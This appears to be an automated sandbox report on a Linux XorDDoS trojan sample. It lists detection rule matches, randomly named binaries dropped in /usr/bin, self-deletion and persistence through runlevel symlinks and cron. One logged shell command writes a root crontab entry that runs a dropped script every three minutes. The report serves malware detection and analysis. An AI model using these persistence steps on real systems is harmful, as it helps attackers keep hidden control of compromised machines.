              Source: 5387.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5495.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5279.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5529.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5329.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5482.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5509.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5492.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5441.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5374.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5472.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5264.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5410.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5348.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5319.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5475.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5281.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5502.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5521.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5254.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5299.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5392.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5517.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5369.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5460.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5334.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5259.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5446.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5549.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5384.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5458.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5498.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5423.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5371.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5489.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5353.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5350.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5221.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: /usr/bin/cvvhpkxdyk, type: DROPPEDMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: /usr/bin/wzulpfbuxk, type: DROPPEDMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: /usr/bin/wzulpfbuxk, type: DROPPEDMatched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
              Source: /usr/bin/njezqqgxiu, type: DROPPEDMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: /usr/bin/njezqqgxiu, type: DROPPEDMatched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
              Source: /usr/bin/tngemhgnzk, type: DROPPEDMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: /usr/bin/tngemhgnzk, type: DROPPEDMatched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
              Source: /usr/bin/aoyymackpm, type: DROPPEDMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: /usr/bin/aoyymackpm, type: DROPPEDMatched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
              Source: /usr/bin/qizbpqmtbi, type: DROPPEDMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: /usr/bin/qizbpqmtbi, type: DROPPEDMatched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
              Source: /usr/bin/gbsknxiwip, type: DROPPEDMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: /usr/bin/gbsknxiwip, type: DROPPEDMatched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
              Source: /usr/bin/uqxezzsakx, type: DROPPEDMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: /usr/bin/uqxezzsakx, type: DROPPEDMatched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
              Source: /usr/lib/libudev.so, type: DROPPEDMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: /usr/lib/libudev.so, type: DROPPEDMatched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
              Source: /usr/bin/cukrqcagnz, type: DROPPEDMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: /usr/bin/cukrqcagnz, type: DROPPEDMatched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
              Source: /usr/bin/cvltgpdmgk, type: DROPPEDMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: /usr/bin/cvltgpdmgk, type: DROPPEDMatched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
              Source: /usr/bin/zareoppgxh, type: DROPPEDMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: /usr/bin/zareoppgxh, type: DROPPEDMatched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
              Source: /usr/bin/gpcmhoiszu, type: DROPPEDMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: /usr/bin/gpcmhoiszu, type: DROPPEDMatched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
              Source: /usr/bin/ysrkbnorkl, type: DROPPEDMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: /usr/bin/ysrkbnorkl, type: DROPPEDMatched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
              Source: classification engineClassification label: mal100.troj.evad.linO@0/19@16/0
              Source: /tmp/0Xorddos.o (PID: 5222)/run/gcc.pid: ccqixroquutawfxidxtibsbbatzhzrcbJump to behavior

              Persistence and Installation Behavior

              barindex
              Sample tries to persist itself using System V runlevels
              Source: /tmp/0Xorddos.o (PID: 5222)File: /etc/rc1.d/S900Xorddos.o -> /etc/init.d/0Xorddos.oJump to behavior
              Source: /tmp/0Xorddos.o (PID: 5222)File: /etc/rc2.d/S900Xorddos.o -> /etc/init.d/0Xorddos.oJump to behavior
              Source: /tmp/0Xorddos.o (PID: 5222)File: /etc/rc3.d/S900Xorddos.o -> /etc/init.d/0Xorddos.oJump to behavior
              Source: /tmp/0Xorddos.o (PID: 5222)File: /etc/rc4.d/S900Xorddos.o -> /etc/init.d/0Xorddos.oJump to behavior
              Source: /tmp/0Xorddos.o (PID: 5222)File: /etc/rc5.d/S900Xorddos.o -> /etc/init.d/0Xorddos.oJump to behavior
              Source: /tmp/0Xorddos.o (PID: 5222)File: /etc/rc.d/rc1.d/S900Xorddos.o -> /etc/init.d/0Xorddos.oJump to behavior
              Source: /tmp/0Xorddos.o (PID: 5222)File: /etc/rc.d/rc2.d/S900Xorddos.o -> /etc/init.d/0Xorddos.oJump to behavior
              Source: /tmp/0Xorddos.o (PID: 5222)File: /etc/rc.d/rc3.d/S900Xorddos.o -> /etc/init.d/0Xorddos.oJump to behavior
              Source: /tmp/0Xorddos.o (PID: 5222)File: /etc/rc.d/rc4.d/S900Xorddos.o -> /etc/init.d/0Xorddos.oJump to behavior
              Source: /tmp/0Xorddos.o (PID: 5222)File: /etc/rc.d/rc5.d/S900Xorddos.o -> /etc/init.d/0Xorddos.oJump to behavior
              Sample tries to persist itself using cron
              Source: /tmp/0Xorddos.o (PID: 5222)File: /etc/cron.hourly/gcc.shJump to behavior
              Source: /bin/sh (PID: 5227)File: /etc/crontabJump to behavior
              Source: /bin/sed (PID: 5228)File: /etc/crontabJump to behavior
              Source: /tmp/0Xorddos.o (PID: 5222)File written: /usr/lib/libudev.soJump to dropped file
              Source: /tmp/0Xorddos.o (PID: 5222)File written: /usr/bin/uqxezzsakxJump to dropped file
              Source: /tmp/0Xorddos.o (PID: 5222)File written: /usr/bin/cukrqcagnzJump to dropped file
              Source: /tmp/0Xorddos.o (PID: 5222)File written: /usr/bin/ysrkbnorklJump to dropped file
              Source: /tmp/0Xorddos.o (PID: 5222)File written: /usr/bin/zareoppgxhJump to dropped file
              Source: /tmp/0Xorddos.o (PID: 5222)File written: /usr/bin/cvltgpdmgkJump to dropped file
              Source: /tmp/0Xorddos.o (PID: 5222)File written: /usr/bin/tngemhgnzkJump to dropped file
              Source: /tmp/0Xorddos.o (PID: 5222)File written: /usr/bin/njezqqgxiuJump to dropped file
              Source: /tmp/0Xorddos.o (PID: 5222)File written: /usr/bin/wzulpfbuxkJump to dropped file
              Source: /tmp/0Xorddos.o (PID: 5222)File written: /usr/bin/aoyymackpmJump to dropped file
              Source: /tmp/0Xorddos.o (PID: 5222)File written: /usr/bin/gbsknxiwipJump to dropped file
              Source: /tmp/0Xorddos.o (PID: 5222)File written: /usr/bin/gpcmhoiszuJump to dropped file
              Source: /tmp/0Xorddos.o (PID: 5222)File written: /usr/bin/qizbpqmtbiJump to dropped file
              Source: /tmp/0Xorddos.o (PID: 5222)File written: /usr/bin/cvvhpkxdykJump to dropped file
              Source: /tmp/0Xorddos.o (PID: 5222)Shell script file created: /etc/cron.hourly/gcc.shJump to dropped file
              Source: /tmp/0Xorddos.o (PID: 5222)Reads from proc file: /proc/statJump to behavior
              Source: /tmp/0Xorddos.o (PID: 5222)Reads from proc file: /proc/meminfoJump to behavior
              Source: /tmp/0Xorddos.o (PID: 5222)Reads from proc file: /proc/cpuinfoJump to behavior
              Source: /sbin/update-rc.d (PID: 5232)Systemctl executable: /bin/systemctl -> systemctl daemon-reloadJump to behavior
              Source: /tmp/0Xorddos.o (PID: 5227)Shell command executed: sh -c "sed -i '/\\/etc\\/cron.hourly\\/gcc.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab"Jump to behavior
              Source: /tmp/0Xorddos.o (PID: 5222)Writes shell script file to disk with an unusual file extension: /etc/init.d/0Xorddos.oJump to dropped file

              Hooking and other Techniques for Hiding and Protection

              barindex
              Drops files in suspicious directories
              Source: /tmp/0Xorddos.o (PID: 5222)File: /etc/init.d/0Xorddos.oJump to dropped file
              Source: /tmp/0Xorddos.o (PID: 5222)File: /usr/bin/uqxezzsakxJump to dropped file
              Source: /tmp/0Xorddos.o (PID: 5222)File: /usr/bin/cukrqcagnzJump to dropped file
              Source: /tmp/0Xorddos.o (PID: 5222)File: /usr/bin/ysrkbnorklJump to dropped file
              Source: /tmp/0Xorddos.o (PID: 5222)File: /usr/bin/zareoppgxhJump to dropped file
              Source: /tmp/0Xorddos.o (PID: 5222)File: /usr/bin/cvltgpdmgkJump to dropped file
              Source: /tmp/0Xorddos.o (PID: 5222)File: /usr/bin/tngemhgnzkJump to dropped file
              Source: /tmp/0Xorddos.o (PID: 5222)File: /usr/bin/njezqqgxiuJump to dropped file
              Source: /tmp/0Xorddos.o (PID: 5222)File: /usr/bin/wzulpfbuxkJump to dropped file
              Source: /tmp/0Xorddos.o (PID: 5222)File: /usr/bin/aoyymackpmJump to dropped file
              Source: /tmp/0Xorddos.o (PID: 5222)File: /usr/bin/gbsknxiwipJump to dropped file
              Source: /tmp/0Xorddos.o (PID: 5222)File: /usr/bin/gpcmhoiszuJump to dropped file
              Source: /tmp/0Xorddos.o (PID: 5222)File: /usr/bin/qizbpqmtbiJump to dropped file
              Source: /tmp/0Xorddos.o (PID: 5222)File: /usr/bin/cvvhpkxdykJump to dropped file
              Sample deletes itself
              Source: /tmp/0Xorddos.o (PID: 5222)File: /usr/bin/uqxezzsakxJump to behavior
              Source: /tmp/0Xorddos.o (PID: 5222)File: /usr/bin/cukrqcagnzJump to behavior
              Source: /tmp/0Xorddos.o (PID: 5222)File: /usr/bin/ysrkbnorklJump to behavior
              Source: /tmp/0Xorddos.o (PID: 5222)File: /usr/bin/zareoppgxhJump to behavior
              Source: /tmp/0Xorddos.o (PID: 5222)File: /usr/bin/cvltgpdmgkJump to behavior
              Source: /tmp/0Xorddos.o (PID: 5222)File: /usr/bin/tngemhgnzkJump to behavior
              Source: /tmp/0Xorddos.o (PID: 5222)File: /usr/bin/njezqqgxiuJump to behavior
              Source: /tmp/0Xorddos.o (PID: 5222)File: /usr/bin/wzulpfbuxkJump to behavior
              Source: /tmp/0Xorddos.o (PID: 5222)File: /usr/bin/aoyymackpmJump to behavior
              Source: /tmp/0Xorddos.o (PID: 5222)File: /usr/bin/gbsknxiwipJump to behavior
              Source: /tmp/0Xorddos.o (PID: 5222)File: /usr/bin/gpcmhoiszuJump to behavior
              Source: /tmp/0Xorddos.o (PID: 5222)File: /usr/bin/qizbpqmtbiJump to behavior
              Source: /tmp/0Xorddos.o (PID: 5222)File: /usr/bin/cvvhpkxdykJump to behavior
              Source: /tmp/0Xorddos.o (PID: 5222)File: /usr/bin/oscovqjuilJump to behavior
              Source: /tmp/0Xorddos.o (PID: 5222)File: /usr/bin/cxictzyxcuJump to behavior
              Source: /tmp/0Xorddos.o (PID: 5222)File: /usr/bin/qfvvwlqqkqJump to behavior
              Source: /tmp/0Xorddos.o (PID: 5222)File: /usr/bin/yfmoszlrcgJump to behavior
              Source: /tmp/0Xorddos.o (PID: 5222)File: /usr/bin/ohcvvmubidJump to behavior
              Source: /tmp/0Xorddos.o (PID: 5222)File: /usr/bin/kswkpwzxrdJump to behavior
              Source: /usr/bin/uqxezzsakx (PID: 5256)File: /usr/bin/uqxezzsakxJump to behavior
              Source: /usr/bin/uqxezzsakx (PID: 5263)File: /usr/bin/uqxezzsakxJump to behavior
              Source: /usr/bin/uqxezzsakx (PID: 5266)File: /usr/bin/uqxezzsakxJump to behavior
              Source: /usr/bin/uqxezzsakx (PID: 5269)File: /usr/bin/uqxezzsakxJump to behavior
              Source: /usr/bin/uqxezzsakx (PID: 5270)File: /usr/bin/uqxezzsakxJump to behavior
              Source: /usr/bin/cukrqcagnz (PID: 5275)File: /usr/bin/cukrqcagnzJump to behavior
              Source: /usr/bin/cukrqcagnz (PID: 5278)File: /usr/bin/cukrqcagnzJump to behavior
              Source: /usr/bin/cukrqcagnz (PID: 5283)File: /usr/bin/cukrqcagnzJump to behavior
              Source: /usr/bin/cukrqcagnz (PID: 5286)File: /usr/bin/cukrqcagnzJump to behavior
              Source: /usr/bin/cukrqcagnz (PID: 5287)File: /usr/bin/cukrqcagnzJump to behavior
              Source: /usr/bin/ysrkbnorkl (PID: 5293)File: /usr/bin/ysrkbnorklJump to behavior
              Source: /usr/bin/ysrkbnorkl (PID: 5298)File: /usr/bin/ysrkbnorklJump to behavior
              Source: /usr/bin/ysrkbnorkl (PID: 5301)File: /usr/bin/ysrkbnorklJump to behavior
              Source: /usr/bin/ysrkbnorkl (PID: 5304)File: /usr/bin/ysrkbnorklJump to behavior
              Source: /usr/bin/ysrkbnorkl (PID: 5305)File: /usr/bin/ysrkbnorklJump to behavior
              Source: /usr/bin/zareoppgxh (PID: 5310)File: /usr/bin/zareoppgxhJump to behavior
              Source: /usr/bin/zareoppgxh (PID: 5315)File: /usr/bin/zareoppgxhJump to behavior
              Source: /usr/bin/zareoppgxh (PID: 5318)File: /usr/bin/zareoppgxhJump to behavior
              Source: /usr/bin/zareoppgxh (PID: 5321)File: /usr/bin/zareoppgxhJump to behavior
              Source: /usr/bin/zareoppgxh (PID: 5322)File: /usr/bin/zareoppgxhJump to behavior
              Source: /usr/bin/cvltgpdmgk (PID: 5328)File: /usr/bin/cvltgpdmgkJump to behavior
              Source: /usr/bin/cvltgpdmgk (PID: 5331)File: /usr/bin/cvltgpdmgkJump to behavior
              Source: /usr/bin/cvltgpdmgk (PID: 5336)File: /usr/bin/cvltgpdmgkJump to behavior
              Source: /usr/bin/cvltgpdmgk (PID: 5339)File: /usr/bin/cvltgpdmgkJump to behavior
              Source: /usr/bin/cvltgpdmgk (PID: 5342)File: /usr/bin/cvltgpdmgkJump to behavior
              Source: /usr/bin/tngemhgnzk (PID: 5347)File: /usr/bin/tngemhgnzkJump to behavior
              Source: /usr/bin/tngemhgnzk (PID: 5352)File: /usr/bin/tngemhgnzkJump to behavior
              Source: /usr/bin/tngemhgnzk (PID: 5355)File: /usr/bin/tngemhgnzkJump to behavior
              Source: /usr/bin/tngemhgnzk (PID: 5358)File: /usr/bin/tngemhgnzkJump to behavior
              Source: /usr/bin/tngemhgnzk (PID: 5359)File: /usr/bin/tngemhgnzkJump to behavior
              Source: /usr/bin/njezqqgxiu (PID: 5365)File: /usr/bin/njezqqgxiuJump to behavior
              Source: /usr/bin/njezqqgxiu (PID: 5368)File: /usr/bin/njezqqgxiuJump to behavior
              Source: /usr/bin/njezqqgxiu (PID: 5373)File: /usr/bin/njezqqgxiuJump to behavior
              Source: /usr/bin/njezqqgxiu (PID: 5376)File: /usr/bin/njezqqgxiuJump to behavior
              Source: /usr/bin/njezqqgxiu (PID: 5377)File: /usr/bin/njezqqgxiuJump to behavior
              Source: /usr/bin/wzulpfbuxk (PID: 5386)File: /usr/bin/wzulpfbuxkJump to behavior
              Source: /usr/bin/wzulpfbuxk (PID: 5391)File: /usr/bin/wzulpfbuxkJump to behavior
              Source: /usr/bin/wzulpfbuxk (PID: 5394)File: /usr/bin/wzulpfbuxkJump to behavior
              Source: /usr/bin/wzulpfbuxk (PID: 5397)File: /usr/bin/wzulpfbuxkJump to behavior
              Source: /usr/bin/wzulpfbuxk (PID: 5398)File: /usr/bin/wzulpfbuxkJump to behavior
              Source: /usr/bin/aoyymackpm (PID: 5403)File: /usr/bin/aoyymackpmJump to behavior
              Source: /usr/bin/aoyymackpm (PID: 5406)File: /usr/bin/aoyymackpmJump to behavior
              Source: /usr/bin/aoyymackpm (PID: 5409)File: /usr/bin/aoyymackpmJump to behavior
              Source: /usr/bin/aoyymackpm (PID: 5414)File: /usr/bin/aoyymackpmJump to behavior
              Source: /usr/bin/aoyymackpm (PID: 5415)File: /usr/bin/aoyymackpmJump to behavior
              Source: /usr/bin/gbsknxiwip (PID: 5420)File: /usr/bin/gbsknxiwipJump to behavior
              Source: /usr/bin/gbsknxiwip (PID: 5425)File: /usr/bin/gbsknxiwipJump to behavior
              Source: /usr/bin/gbsknxiwip (PID: 5430)File: /usr/bin/gbsknxiwipJump to behavior
              Source: /usr/bin/gbsknxiwip (PID: 5431)File: /usr/bin/gbsknxiwipJump to behavior
              Source: /usr/bin/gbsknxiwip (PID: 5432)File: /usr/bin/gbsknxiwipJump to behavior
              Source: /usr/bin/gpcmhoiszu (PID: 5437)File: /usr/bin/gpcmhoiszuJump to behavior
              Source: /usr/bin/gpcmhoiszu (PID: 5440)File: /usr/bin/gpcmhoiszuJump to behavior
              Source: /usr/bin/gpcmhoiszu (PID: 5443)File: /usr/bin/gpcmhoiszuJump to behavior
              Source: /usr/bin/gpcmhoiszu (PID: 5448)File: /usr/bin/gpcmhoiszuJump to behavior
              Source: /usr/bin/gpcmhoiszu (PID: 5451)File: /usr/bin/gpcmhoiszuJump to behavior
              Source: /usr/bin/qizbpqmtbi (PID: 5457)File: /usr/bin/qizbpqmtbiJump to behavior
              Source: /usr/bin/qizbpqmtbi (PID: 5462)File: /usr/bin/qizbpqmtbiJump to behavior
              Source: /usr/bin/qizbpqmtbi (PID: 5465)File: /usr/bin/qizbpqmtbiJump to behavior
              Source: /usr/bin/qizbpqmtbi (PID: 5468)File: /usr/bin/qizbpqmtbiJump to behavior
              Source: /usr/bin/qizbpqmtbi (PID: 5469)File: /usr/bin/qizbpqmtbiJump to behavior
              Source: /usr/bin/cvvhpkxdyk (PID: 5474)File: /usr/bin/cvvhpkxdykJump to behavior
              Source: /usr/bin/cvvhpkxdyk (PID: 5477)File: /usr/bin/cvvhpkxdykJump to behavior
              Source: /usr/bin/cvvhpkxdyk (PID: 5483)File: /usr/bin/cvvhpkxdykJump to behavior
              Source: /usr/bin/cvvhpkxdyk (PID: 5485)File: /usr/bin/cvvhpkxdykJump to behavior
              Source: /usr/bin/cvvhpkxdyk (PID: 5486)File: /usr/bin/cvvhpkxdykJump to behavior
              Source: /usr/bin/oscovqjuil (PID: 5491)File: /usr/bin/oscovqjuilJump to behavior
              Source: /usr/bin/oscovqjuil (PID: 5494)File: /usr/bin/oscovqjuilJump to behavior
              Source: /usr/bin/oscovqjuil (PID: 5497)File: /usr/bin/oscovqjuilJump to behavior
              Source: /usr/bin/oscovqjuil (PID: 5503)File: /usr/bin/oscovqjuilJump to behavior
              Source: /usr/bin/oscovqjuil (PID: 5505)File: /usr/bin/oscovqjuilJump to behavior
              Source: /usr/bin/cxictzyxcu (PID: 5511)File: /usr/bin/cxictzyxcuJump to behavior
              Source: /usr/bin/cxictzyxcu (PID: 5514)File: /usr/bin/cxictzyxcuJump to behavior
              Source: /usr/bin/cxictzyxcu (PID: 5518)File: /usr/bin/cxictzyxcuJump to behavior
              Source: /usr/bin/cxictzyxcu (PID: 5520)File: /usr/bin/cxictzyxcuJump to behavior
              Source: /usr/bin/cxictzyxcu (PID: 5523)File: /usr/bin/cxictzyxcuJump to behavior
              Source: /usr/bin/qfvvwlqqkq (PID: 5528)File: /usr/bin/qfvvwlqqkqJump to behavior
              Source: /usr/bin/qfvvwlqqkq (PID: 5531)File: /usr/bin/qfvvwlqqkqJump to behavior
              Source: /usr/bin/qfvvwlqqkq (PID: 5535)File: /usr/bin/qfvvwlqqkqJump to behavior
              Source: /usr/bin/qfvvwlqqkq (PID: 5539)File: /usr/bin/qfvvwlqqkqJump to behavior
              Source: /usr/bin/qfvvwlqqkq (PID: 5541)File: /usr/bin/qfvvwlqqkqJump to behavior
              Source: /usr/bin/yfmoszlrcg (PID: 5548)File: /usr/bin/yfmoszlrcgJump to behavior
              Source: /usr/bin/yfmoszlrcg (PID: 5551)File: /usr/bin/yfmoszlrcgJump to behavior
              Source: /usr/bin/yfmoszlrcg (PID: 5556)File: /usr/bin/yfmoszlrcgJump to behavior
              Source: /usr/bin/yfmoszlrcg (PID: 5559)File: /usr/bin/yfmoszlrcgJump to behavior
              Source: /usr/bin/yfmoszlrcg (PID: 5560)File: /usr/bin/yfmoszlrcgJump to behavior
              Source: /usr/bin/ohcvvmubid (PID: 5567)File: /usr/bin/ohcvvmubidJump to behavior
              Source: /usr/bin/ohcvvmubid (PID: 5570)File: /usr/bin/ohcvvmubidJump to behavior
              Source: /usr/bin/ohcvvmubid (PID: 5573)File: /usr/bin/ohcvvmubidJump to behavior
              Source: /usr/bin/ohcvvmubid (PID: 5576)File: /usr/bin/ohcvvmubidJump to behavior
              Source: /usr/bin/ohcvvmubid (PID: 5577)File: /usr/bin/ohcvvmubidJump to behavior
              Source: /tmp/0Xorddos.o (PID: 5222)Path: /etc/cron.hourly/gcc.shJump to dropped file
              Source: /tmp/0Xorddos.o (PID: 5222)Path: /run/gcc.pidJump to dropped file
              Source: /tmp/0Xorddos.o (PID: 5221)Queries kernel information via 'uname': Jump to behavior
              Source: /tmp/0Xorddos.o (PID: 5222)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/uqxezzsakx (PID: 5255)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/uqxezzsakx (PID: 5260)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/uqxezzsakx (PID: 5262)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/uqxezzsakx (PID: 5265)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/uqxezzsakx (PID: 5268)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/cukrqcagnz (PID: 5274)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/cukrqcagnz (PID: 5277)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/cukrqcagnz (PID: 5280)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/cukrqcagnz (PID: 5282)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/cukrqcagnz (PID: 5285)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/ysrkbnorkl (PID: 5292)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/ysrkbnorkl (PID: 5295)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/ysrkbnorkl (PID: 5297)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/ysrkbnorkl (PID: 5300)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/ysrkbnorkl (PID: 5303)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/zareoppgxh (PID: 5309)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/zareoppgxh (PID: 5312)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/zareoppgxh (PID: 5314)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/zareoppgxh (PID: 5317)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/zareoppgxh (PID: 5320)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/cvltgpdmgk (PID: 5327)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/cvltgpdmgk (PID: 5330)Queries kernel information via 'uname': Jump to behavior
